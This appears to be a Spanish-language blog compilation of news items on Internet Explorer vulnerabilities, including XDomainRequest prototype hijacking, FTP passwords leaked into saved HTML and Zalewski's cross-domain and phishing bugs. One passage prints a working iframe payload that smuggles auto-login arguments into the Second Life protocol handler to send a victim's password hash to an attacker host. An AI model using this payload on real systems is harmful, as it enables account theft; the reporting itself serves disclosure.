Internet Explorer

Internet Explorer 8 es vulnerable al secuestro de prototipos en el objeto XDomainRequest, una nueva característica que permite llamadas XML entre dominios. Se trata de un ataque muy similar al descrito en 2006 por Stefano Di Paola y Giorgio Fedon sobre XMLHttpRequest.

Además, puesto que Explorer 8 intenta crear otra nueva ventana de sesión cuando una ventana se cuelga, se acaba produciendo un cuelgue repetido y persistente que sólo puede detenerse reiniciando el sistema completo...

Según acaba de publicar GNU Citizen (y confirma Sergio Maone, creador de NoScript), nuestro viejo amigo el bug "compartido" (sí, ése sobre el que un preclaro MVP de Microsoft asegura que esta empresa no tiene ninguna responsabilidad) permite que te roben impunemente tu "existencia" en Second Life, un mundo virtual... donde también se hacen negocios reales.

Tan sencillo como hacer que la víctima visite con Explorer una página maliciosa con el siguiente contenido:

<iframe src='secondlife://" -autologin -loginuri
"http://web.atacante.com/sl/record-login.php'>
</iframe>

Se provoca así el arranque del cliente de Second Life, que intenta loguearse automáticamente en la web del atacante. Un script situado en ésta recoge el hash MD5 de la contraseña, que puede ser utilizado directamente para loguearse, o bien pasarse por unas rainbow tables para extraer la contraseña en claro...

El problema afecta sobre todo a los usuarios que disponen de sitios web y acceden a ellos para modificar algún documento utilizando Explorer como cliente de FTP.

Sorprendentemente, tras editar un fichero HTML y guardarlo de nuevo, Explorer incluye, como comentario en el código fuente de la página, el nombre de usuario y contraseña de acceso al servidor FTP. En resumen: cualquiera que se descargue esa página en lo sucesivo dispone de las credenciales necesarias para modificar el sitio web o hacerlo desaparecer...

La primera y más grave afecta por igual a Explorer 6 y Explorer 7. Consiste en que existe una ventana de oportunidad para un atacante cuando Explorer salta mediante Javascript de una página a otra en otro dominio, durante la cual puede ejecutarse código javascript con los permisos de que se disfrutaba en la página antigua. Esta vulnerabilidad permite leer o establecer cookies, alterar DOM, cambiar las URLs de envío de formularios, inyectar código o colgar el navegador corrompiendo la memoria al leer y escribir sobre estructuras de datos aún no inicializadas por completo.

La gravedad de este bug, en palabras de Zalewski, consiste en que "todo el modelo de seguridad del navegador se cae como un castillo de naipes y nos deja vulnerables ante una plétora de ataques maliciosos; y el compromiso del sistema local tampoco puede descartarse."...

Para quienes acusan al polaco de estar obsesionado con buscarle las vueltas a Firefox, Zalewski dedica hoy su atención a una nueva vulnerabilidad en Explorer 7, que convierte a éste (al parecer, tanto en Windows XP como en Vista) en colaborador involuntario de ciertos ataques de phishing.

Al parecer, Microsoft fue avisada hace más de un mes, pero Zalewski parece que se ha cansado de esperar. Secunia por su parte se atribuye el descubrimiento y afirma que lo ha publicado hoy debido a la revelación realizada por una "tercera parte".

Por último, un consejo para partidarios de Firefox: antes de lanzar las campanas al vuelo, mediten sobre esta frase de Zalewski, que no augura nada bueno:

Firefox no parece abiertamente vulnerable, pero a juzgar por su comportamiento, es posible que sea vulnerable a una variante de este bug (exhibe la misma conducta pero lleva a una página corrupta en su lugar). Lo investigaré en cuanto duerma un poco.

Editado (19:12): Zalewski confirma que Firefox también es vulnerable.